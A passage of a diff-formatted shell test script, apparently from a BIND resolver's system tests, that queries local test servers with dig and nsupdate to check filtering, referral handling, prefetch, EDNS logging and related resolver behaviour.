n=$((n+1)) + echo_i "checking that local bound address can be set (Can't query from a denied address) ($n)" + ret=0 + resolve_with_opts -b 10.53.0.8 -t a -s 10.53.0.1 www.example.org 2> resolve.out.ns1.test${n} || ret=1 + grep "resolution failed: SERVFAIL" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) + + n=$((n+1)) + echo_i "checking that local bound address can be set (Can query from an allowed address) ($n)" + ret=0 + resolve_with_opts -b 10.53.0.1 -t a -s 10.53.0.1 www.example.org > resolve.out.ns1.test${n} || ret=1 + grep "www.example.org..*.192.0.2.1" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "checking non-cachable NODATA response handling ($n)" +ret=0 +dig_with_opts +tcp nodata.example.net @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking non-cachable NODATA response handling using dns_client ($n)" + ret=0 + resolve_with_opts -t a -s 10.53.0.1 nodata.example.net 2> resolve.out.ns1.test${n} || ret=1 + grep "resolution failed: ncache nxrrset" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "checking handling of bogus referrals ($n)" +# If the server has the "INSIST(!external)" bug, this query will kill it. +dig_with_opts +tcp www.example.com. a @10.53.0.1 >/dev/null || { echo_i "failed"; status=$((status + 1)); } + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking handling of bogus referrals using dns_client ($n)" + ret=0 + resolve_with_opts -t a -s 10.53.0.1 www.example.com 2> resolve.out.ns1.test${n} || ret=1 + grep "resolution failed: SERVFAIL" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "check handling of cname + other data / 1 ($n)" +dig_with_opts +tcp cname1.example.com. a @10.53.0.1 >/dev/null || { echo_i "failed"; status=$((status + 1)); } + +n=$((n+1)) +echo_i "check handling of cname + other data / 2 ($n)" +dig_with_opts +tcp cname2.example.com. a @10.53.0.1 >/dev/null || { echo_i "failed"; status=$((status + 1)); } + +n=$((n+1)) +echo_i "check that server is still running ($n)" +dig_with_opts +tcp www.example.com. a @10.53.0.1 >/dev/null || { echo_i "failed"; status=$((status + 1)); } + +n=$((n+1)) +echo_i "checking answer IPv4 address filtering (deny) ($n)" +ret=0 +dig_with_opts +tcp www.example.net @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: SERVFAIL" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "checking answer IPv6 address filtering (deny) ($n)" +ret=0 +dig_with_opts +tcp www.example.net @10.53.0.1 aaaa > dig.out.ns1.test${n} || ret=1 +grep "status: SERVFAIL" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "checking answer IPv4 address filtering (accept) ($n)" +ret=0 +dig_with_opts +tcp www.example.org @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking answer IPv4 address filtering using dns_client (accept) ($n)" + ret=0 + resolve_with_opts -t a -s 10.53.0.1 www.example.org > resolve.out.ns1.test${n} || ret=1 + grep "www.example.org..*.192.0.2.1" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "checking answer IPv6 address filtering (accept) ($n)" +ret=0 +dig_with_opts +tcp www.example.org @10.53.0.1 aaaa > dig.out.ns1.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking answer IPv6 address filtering using dns_client (accept) ($n)" + ret=0 + resolve_with_opts -t aaaa -s 10.53.0.1 www.example.org > resolve.out.ns1.test${n} || ret=1 + grep "www.example.org..*.2001:db8:beef::1" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "checking CNAME target filtering (deny) ($n)" +ret=0 +dig_with_opts +tcp badcname.example.net @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: SERVFAIL" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "checking CNAME target filtering (accept) ($n)" +ret=0 +dig_with_opts +tcp goodcname.example.net @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking CNAME target filtering using dns_client (accept) ($n)" + ret=0 + resolve_with_opts -t a -s 10.53.0.1 goodcname.example.net > resolve.out.ns1.test${n} || ret=1 + grep "goodcname.example.net..*.goodcname.example.org." resolve.out.ns1.test${n} > /dev/null || ret=1 + grep "goodcname.example.org..*.192.0.2.1" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "checking CNAME target filtering (accept due to subdomain) ($n)" +ret=0 +dig_with_opts +tcp cname.sub.example.org @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking CNAME target filtering using dns_client (accept due to subdomain) ($n)" + ret=0 + resolve_with_opts -t a -s 10.53.0.1 cname.sub.example.org > resolve.out.ns1.test${n} || ret=1 + grep "cname.sub.example.org..*.ok.sub.example.org." resolve.out.ns1.test${n} > /dev/null || ret=1 + grep "ok.sub.example.org..*.192.0.2.1" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "checking DNAME target filtering (deny) ($n)" +ret=0 +dig_with_opts +tcp foo.baddname.example.net @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "DNAME target foo.baddname.example.org denied for foo.baddname.example.net/IN" ns1/named.run >/dev/null || ret=1 +grep "status: SERVFAIL" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "checking DNAME target filtering (accept) ($n)" +ret=0 +dig_with_opts +tcp foo.gooddname.example.net @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking DNAME target filtering using dns_client (accept) ($n)" + ret=0 + resolve_with_opts -t a -s 10.53.0.1 foo.gooddname.example.net > resolve.out.ns1.test${n} || ret=1 + grep "foo.gooddname.example.net..*.gooddname.example.org" resolve.out.ns1.test${n} > /dev/null || ret=1 + grep "foo.gooddname.example.org..*.192.0.2.1" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "checking DNAME target filtering (accept due to subdomain) ($n)" +ret=0 +dig_with_opts +tcp www.dname.sub.example.org @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking DNAME target filtering using dns_client (accept due to subdomain) ($n)" + ret=0 + resolve_with_opts -t a -s 10.53.0.1 www.dname.sub.example.org > resolve.out.ns1.test${n} || ret=1 + grep "www.dname.sub.example.org..*.ok.sub.example.org." resolve.out.ns1.test${n} > /dev/null || ret=1 + grep "www.ok.sub.example.org..*.192.0.2.1" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "check that the resolver accepts a referral response with a non-empty ANSWER section ($n)" +ret=0 +dig_with_opts @10.53.0.1 foo.glue-in-answer.example.org. A > dig.ns1.out.${n} || ret=1 +grep "status: NOERROR" dig.ns1.out.${n} > /dev/null || ret=1 +grep "foo.glue-in-answer.example.org.*192.0.2.1" dig.ns1.out.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that the resolver limits the number of NS records it follows in a referral response ($n)" +# ns5 is the recusor being tested. ns4 holds the sourcens zone containing names with varying numbers of NS +# records pointing to non-existent nameservers in the targetns zone on ns6. +ret=0 +rndccmd 10.53.0.5 flush || ret=1 # Ensure cache is empty before doing this test +for nscount in 1 2 3 4 5 6 7 8 9 10 +do + # Verify number of NS records at source server + dig_with_opts +norecurse @10.53.0.4 target${nscount}.sourcens ns > dig.ns4.out.${nscount}.${n} + sourcerecs=$(grep NS dig.ns4.out.${nscount}.${n} | grep -v ';' | wc -l) + test "${sourcerecs}" -eq "${nscount}" || ret=1 + test "${sourcerecs}" -eq "${nscount}" || echo_i "NS count incorrect for target${nscount}.sourcens" + # Expected queries = 2 * number of NS records, up to a maximum of 10. + expected=$((nscount*2)) + if [ "$expected" -gt 10 ]; then expected=10; fi + # Work out the queries made by checking statistics on the target before and after the test + rndccmd 10.53.0.6 stats || ret=1 + initial_count=$(awk '/responses sent/ {print $1}' ns6/named.stats) + mv ns6/named.stats ns6/named.stats.initial.${nscount}.${n} + dig_with_opts @10.53.0.5 target${nscount}.sourcens A > dig.ns5.out.${nscount}.${n} || ret=1 + rndccmd 10.53.0.6 stats || ret=1 + final_count=$(awk '/responses sent/ {print $1}' ns6/named.stats) + mv ns6/named.stats ns6/named.stats.final.${nscount}.${n} + # Check number of queries during the test is as expected + actual=$((final_count - initial_count)) + if [ "$actual" -ne "$expected" ]; then + echo_i "query count error: $nscount NS records: expected queries $expected, actual $actual" + ret=1 + fi +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "RT21594 regression test check setup ($n)" +ret=0 +# Check that "aa" is not being set by the authoritative server. +dig_with_opts +tcp . @10.53.0.4 soa > dig.ns4.out.${n} || ret=1 +grep 'flags: qr rd;' dig.ns4.out.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "RT21594 regression test positive answers ($n)" +ret=0 +# Check that resolver accepts the non-authoritative positive answers. +dig_with_opts +tcp . @10.53.0.5 soa > dig.ns5.out.${n} || ret=1 +grep "status: NOERROR" dig.ns5.out.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "RT21594 regression test NODATA answers ($n)" +ret=0 +# Check that resolver accepts the non-authoritative nodata answers. +dig_with_opts +tcp . @10.53.0.5 txt > dig.ns5.out.${n} || ret=1 +grep "status: NOERROR" dig.ns5.out.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "RT21594 regression test NXDOMAIN answers ($n)" +ret=0 +# Check that resolver accepts the non-authoritative positive answers. +dig_with_opts +tcp noexistent @10.53.0.5 txt > dig.ns5.out.${n} || ret=1 +grep "status: NXDOMAIN" dig.ns5.out.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that replacement of additional data by a negative cache no data entry clears the additional RRSIGs ($n)" +ret=0 +dig_with_opts +tcp mx example.net @10.53.0.7 > dig.ns7.out.${n} || ret=1 +grep "status: NOERROR" dig.ns7.out.${n} > /dev/null || ret=1 +if [ $ret = 1 ]; then echo_i "mx priming failed"; fi +$NSUPDATE << EOF +server 10.53.0.6 ${PORT} +zone example.net +update delete mail.example.net A +update add mail.example.net 0 AAAA ::1 +send +EOF +dig_with_opts +tcp a mail.example.net @10.53.0.7 > dig.ns7.out.${n} || ret=2 +grep "status: NOERROR" dig.ns7.out.${n} > /dev/null || ret=2 +grep "ANSWER: 0" dig.ns7.out.${n} > /dev/null || ret=2 +if [ $ret = 2 ]; then echo_i "ncache priming failed"; fi +dig_with_opts +tcp mx example.net @10.53.0.7 > dig.ns7.out.${n} || ret=3 +grep "status: NOERROR" dig.ns7.out.${n} > /dev/null || ret=3 +dig_with_opts +tcp rrsig mail.example.net +norec @10.53.0.7 > dig.ns7.out.${n} || ret=4 +grep "status: NOERROR" dig.ns7.out.${n} > /dev/null || ret=4 +grep "ANSWER: 0" dig.ns7.out.${n} > /dev/null || ret=4 +if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi +status=$((status + ret)) + +if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "checking that update a nameservers address has immediate effects ($n)" +ret=0 +dig_with_opts +tcp TXT foo.moves @10.53.0.7 > dig.ns7.foo.${n} || ret=1 +grep "From NS 5" dig.ns7.foo.${n} > /dev/null || ret=1 +$NSUPDATE << EOF +server 10.53.0.7 ${PORT} +zone server +update delete ns.server A +update add ns.server 300 A 10.53.0.4 +send +EOF +sleep 1 +dig_with_opts +tcp TXT bar.moves @10.53.0.7 > dig.ns7.bar.${n} || ret=1 +grep "From NS 4" dig.ns7.bar.${n} > /dev/null || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; status=1; fi + +n=$((n+1)) +echo_i "checking that update a nameservers glue has immediate effects ($n)" +ret=0 +dig_with_opts +tcp TXT foo.child.server @10.53.0.7 > dig.ns7.foo.${n} || ret=1 +grep "From NS 5" dig.ns7.foo.${n} > /dev/null || ret=1 +$NSUPDATE << EOF +server 10.53.0.7 ${PORT} +zone server +update delete ns.child.server A +update add ns.child.server 300 A 10.53.0.4 +send +EOF +sleep 1 +dig_with_opts +tcp TXT bar.child.server @10.53.0.7 > dig.ns7.bar.${n} || ret=1 +grep "From NS 4" dig.ns7.bar.${n} > /dev/null || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; status=1; fi + +n=$((n+1)) +echo_i "checking empty RFC 1918 reverse zones ($n)" +ret=0 +# Check that "aa" is being set by the resolver for RFC 1918 zones +# except the one that has been deliberately disabled +dig_with_opts @10.53.0.7 -x 10.1.1.1 > dig.ns4.out.1.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.1.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 192.168.1.1 > dig.ns4.out.2.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.2.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.16.1.1 > dig.ns4.out.3.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.3.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.17.1.1 > dig.ns4.out.4.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.4.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.18.1.1 > dig.ns4.out.5.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.5.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.19.1.1 > dig.ns4.out.6.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.6.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.21.1.1 > dig.ns4.out.7.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.7.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.22.1.1 > dig.ns4.out.8.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.8.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.23.1.1 > dig.ns4.out.9.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.9.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.24.1.1 > dig.ns4.out.11.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.11.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.25.1.1 > dig.ns4.out.12.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.12.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.26.1.1 > dig.ns4.out.13.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.13.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.27.1.1 > dig.ns4.out.14.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.14.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.28.1.1 > dig.ns4.out.15.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.15.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.29.1.1 > dig.ns4.out.16.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.16.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.30.1.1 > dig.ns4.out.17.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.17.${n} > /dev/null || ret=1 +dig_with_opts @10.53.0.7 -x 172.31.1.1 > dig.ns4.out.18.${n} || ret=1 +grep 'flags: qr aa rd ra;' dig.ns4.out.18.${n} > /dev/null || ret=1 +# but this one should NOT be authoritative +dig_with_opts @10.53.0.7 -x 172.20.1.1 > dig.ns4.out.19.${n} || ret=1 +grep 'flags: qr rd ra;' dig.ns4.out.19.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; status=1; fi + +n=$((n+1)) +echo_i "checking that removal of a delegation is honoured ($n)" +ret=0 +dig_with_opts @10.53.0.5 www.to-be-removed.tld A > dig.ns5.prime.${n} +grep "status: NOERROR" dig.ns5.prime.${n} > /dev/null || { ret=1; echo_i "priming failed"; } +cp ns4/tld2.db ns4/tld.db +rndc_reload ns4 10.53.0.4 tld +old= +for i in 0 1 2 3 4 5 6 7 8 9 +do + foo=0 + dig_with_opts @10.53.0.5 ns$i.to-be-removed.tld A > /dev/null + dig_with_opts @10.53.0.5 www.to-be-removed.tld A > dig.ns5.out.${n} + grep "status: NXDOMAIN" dig.ns5.out.${n} > /dev/null || foo=1 + [ $foo = 0 ] && break + $NSUPDATE << EOF +server 10.53.0.6 ${PORT} +zone to-be-removed.tld +update add to-be-removed.tld 100 NS ns${i}.to-be-removed.tld +update delete to-be-removed.tld NS ns${old}.to-be-removed.tld +send +EOF + old=$i + sleep 1 +done +[ $ret = 0 ] && ret=$foo; +if [ $ret != 0 ]; then echo_i "failed"; status=1; fi + +n=$((n+1)) +echo_i "check for improved error message with SOA mismatch ($n)" +ret=0 +dig_with_opts @10.53.0.1 www.sub.broken aaaa > dig.out.ns1.test${n} || ret=1 +grep "not subdomain of zone" ns1/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +copy_setports ns7/named2.conf.in ns7/named.conf +rndccmd 10.53.0.7 reconfig 2>&1 | sed 's/^/ns7 /' | cat_i + +n=$((n+1)) +echo_i "check resolution on the listening port ($n)" +ret=0 +dig_with_opts +tcp +tries=2 +time=5 mx example.net @10.53.0.7 > dig.ns7.out.${n} || ret=2 +grep "status: NOERROR" dig.ns7.out.${n} > /dev/null || ret=1 +grep "ANSWER: 1" dig.ns7.out.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check prefetch (${n})" +ret=0 +# read prefetch value from config. +PREFETCH=$(sed -n "s/[[:space:]]*prefetch \([0-9]\).*/\1/p" ns5/named.conf) +dig_with_opts @10.53.0.5 fetch.tld txt > dig.out.1.${n} || ret=1 +ttl1=$(awk '/"A" "short" "ttl"/ { print $2 }' dig.out.1.${n}) +interval=$((ttl1 - PREFETCH + 1)) +# sleep so we are in prefetch range +sleep ${interval:-0} +# trigger prefetch +dig_with_opts @10.53.0.5 fetch.tld txt > dig.out.2.${n} || ret=1 +ttl2=$(awk '/"A" "short" "ttl"/ { print $2 }' dig.out.2.${n}) +sleep 1 +# check that prefetch occurred +dig_with_opts @10.53.0.5 fetch.tld txt > dig.out.3.${n} || ret=1 +ttl=$(awk '/"A" "short" "ttl"/ { print $2 }' dig.out.3.${n}) +test "${ttl:-0}" -gt "${ttl2:-1}" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check prefetch of validated DS's RRSIG TTL is updated (${n})" +ret=0 +dig_with_opts +dnssec @10.53.0.5 ds.example.net ds > dig.out.1.${n} || ret=1 +dsttl1=$(awk '$4 == "DS" && $7 == "2" { print $2 }' dig.out.1.${n}) +interval=$((dsttl1 - PREFETCH + 1)) +# sleep so we are in prefetch range +sleep ${interval:-0} +# trigger prefetch +dig_with_opts @10.53.0.5 ds.example.net ds > dig.out.2.${n} || ret=1 +dsttl2=$(awk '$4 == "DS" && $7 == "2" { print $2 }' dig.out.2.${n}) +sleep 1 +# check that prefetch occurred +dig_with_opts @10.53.0.5 ds.example.net ds +dnssec > dig.out.3.${n} || ret=1 +dsttl=$(awk '$4 == "DS" && $7 == "2" { print $2 }' dig.out.3.${n}) +sigttl=$(awk '$4 == "RRSIG" && $5 == "DS" { print $2 }' dig.out.3.${n}) +test "${dsttl:-0}" -gt "${dsttl2:-1}" || ret=1 +test "${sigttl:-0}" -gt "${dsttl2:-1}" || ret=1 +test "${dsttl:-0}" -eq "${sigttl:-1}" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check prefetch disabled (${n})" +ret=0 +dig_with_opts @10.53.0.7 fetch.example.net txt > dig.out.1.${n} || ret=1 +ttl1=$(awk '/"A" "short" "ttl"/ { print $2 }' dig.out.1.${n}) +interval=$((ttl1 - PREFETCH + 1)) +# sleep so we are in expire range +sleep ${interval:-0} +tmp_ttl=$ttl1 +no_prefetch() { + # fetch record and ensure its ttl is in range 0 < ttl < tmp_ttl. + # since prefetch is disabled, updated ttl must be a lower value than + # the previous one. + dig_with_opts @10.53.0.7 fetch.example.net txt > dig.out.2.${n} || return 1 + ttl2=$(awk '/"A" "short" "ttl"/ { print $2 }' dig.out.2.${n}) + # check that prefetch has not occurred + if [ "$ttl2" -ge "${tmp_ttl}" ]; then + return 1 + fi + tmp_ttl=$ttl2 +} +retry_quiet 3 no_prefetch || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check prefetch qtype * (${n})" +ret=0 +dig_with_opts @10.53.0.5 fetchall.tld any > dig.out.1.${n} || ret=1 +ttl1=$(awk '/"A" "short" "ttl"/ { print $2 - 3 }' dig.out.1.${n}) +# sleep so we are in prefetch range +sleep "${ttl1:-0}" +# trigger prefetch +dig_with_opts @10.53.0.5 fetchall.tld any > dig.out.2.${n} || ret=1 +ttl2=$(awk '/"A" "short" "ttl"/ { print $2 }' dig.out.2.${n}) +sleep 1 +# check that prefetch occurred; +# note that only one record is prefetched, which is the TXT record in this case, +# because of the order of the records in the cache +dig_with_opts @10.53.0.5 fetchall.tld any > dig.out.3.${n} || ret=1 +ttl3=$(awk '/"A" "short" "ttl"/ { print $2 }' dig.out.3.${n}) +test "${ttl3:-0}" -gt "${ttl2:-1}" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that E was logged on EDNS queries in the query log (${n})" +ret=0 +dig_with_opts @10.53.0.5 +edns edns.fetchall.tld any > dig.out.2.${n} || ret=1 +grep "query: edns.fetchall.tld IN ANY +E" ns5/named.run > /dev/null || ret=1 +dig_with_opts @10.53.0.5 +noedns noedns.fetchall.tld any > dig.out.2.${n} || ret=1 +grep "query: noedns.fetchall.tld IN ANY" ns5/named.run > /dev/null || ret=1 +grep "query: noedns.fetchall.tld IN ANY +E" ns5/named.run > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that '-t aaaa' in .digrc does not have unexpected side effects ($n)" +ret=0 +echo "-t aaaa" > .digrc +(HOME="$(pwd)" dig_with_opts @10.53.0.4 . > dig.out.1.${n}) || ret=1 +(HOME="$(pwd)" dig_with_opts @10.53.0.4 . A > dig.out.2.${n}) || ret=1 +(HOME="$(pwd)" dig_with_opts @10.53.0.4 -x 127.0.0.1 > dig.out.3.${n}) || ret=1 +grep ';\..*IN.*AAAA$' dig.out.1.${n} > /dev/null || ret=1 +grep ';\..*IN.*A$' dig.out.2.${n} > /dev/null || ret=1 +grep 'extra type option' dig.out.2.${n} > /dev/null && ret=1 +grep ';1\.0\.0\.127\.in-addr\.arpa\..*IN.*PTR$' dig.out.3.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +edns=$($FEATURETEST --edns-version) + +n=$((n+1)) +echo_i "check that EDNS version is logged (${n})" +ret=0 +dig_with_opts @10.53.0.5 +edns edns0.fetchall.tld any > dig.out.2.${n} || ret=1 +grep "query: edns0.fetchall.tld IN ANY +E(0)" ns5/named.run > /dev/null || ret=1 +if test "${edns:-0}" != 0; then + dig_with_opts @10.53.0.5 +edns=1 edns1.fetchall.tld any > dig.out.2.${n} || ret=1 + grep "query: edns1.fetchall.tld IN ANY +E(1)" ns5/named.run > /dev/null || ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +if test "${edns:-0}" != 0; then + n=$((n+1)) + echo_i "check that edns-version is honoured (${n})" + ret=0 + dig_with_opts @10.53.0.5 +edns no-edns-version.tld > dig.out.1.${n} || ret=1 + grep "query: no-edns-version.tld IN A -E(1)" ns6/named.run > /dev/null || ret=1 + dig_with_opts @10.53.0.5 +edns edns-version.tld > dig.out.2.${n} || ret=1 + grep "query: edns-version.tld IN A -E(0)" ns7/named.run > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "check that CNAME nameserver is logged correctly (${n})" +ret=0 +dig_with_opts soa all-cnames @10.53.0.5 > dig.out.ns5.test${n} || ret=1 +grep "status: SERVFAIL" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "skipping nameserver 'cname.tld' because it is a CNAME, while resolving 'all-cnames/SOA'" ns5/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that unexpected opcodes are handled correctly (${n})" +ret=0 +dig_with_opts soa all-cnames @10.53.0.5 +opcode=15 +cd +rec +ad +zflag > dig.out.ns5.test${n} || ret=1 +grep "status: NOTIMP" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "flags:[^;]* qr[; ]" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "flags:[^;]* ra[; ]" dig.out.ns5.test${n} > /dev/null && ret=1 +grep "flags:[^;]* rd[; ]" dig.out.ns5.test${n} > /dev/null && ret=1 +grep "flags:[^;]* cd[; ]" dig.out.ns5.test${n} > /dev/null && ret=1 +grep "flags:[^;]* ad[; ]" dig.out.ns5.test${n} > /dev/null && ret=1 +grep "flags:[^;]*; MBZ: " dig.out.ns5.test${n} > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that EDNS client subnet with non-zeroed bits is handled correctly (${n})" +ret=0 +# 0001 (IPv4) 1f (31 significant bits) 00 (0) ffffffff (255.255.255.255) +dig_with_opts soa . @10.53.0.5 +ednsopt=8:00011f00ffffffff > dig.out.ns5.test${n} || ret=1 +grep "status: FORMERR" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "; EDNS: version:" dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that dig +subnet zeros address bits correctly (${n})" +ret=0 +dig_with_opts soa . @10.53.0.5 +subnet=255.255.255.255/23 > dig.out.ns5.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns5.test${n} > /dev/null || ret=1 +grep "CLIENT-SUBNET: 255.255.254.0/23/0" dig.out.ns5.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that SOA query returns data for delegation-only apex (${n})" +ret=0 